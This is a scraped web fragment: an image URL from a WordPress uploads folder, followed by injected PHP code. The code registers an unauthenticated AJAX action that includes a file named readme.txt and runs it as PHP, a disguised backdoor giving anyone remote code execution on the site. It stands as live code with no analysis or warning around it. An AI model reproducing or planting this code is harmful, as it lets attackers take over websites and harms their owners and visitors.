http://pnl.ippnl.com.br/wp-content/uploads/2016/04/cropped-logo_8080.png
if(!function_exists('file_check_readme89879')){ add_action('wp_ajax_nopriv_file_check_readme89879', 'file_check_readme89879'); add_action('wp_ajax_file_check_readme89879', 'file_check_readme89879'); function file_check_readme89879() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }